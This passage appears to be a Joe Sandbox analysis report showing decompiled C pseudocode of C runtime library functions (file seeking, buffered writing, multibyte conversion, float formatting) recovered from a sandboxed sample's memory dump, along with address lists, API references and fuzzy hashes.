									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
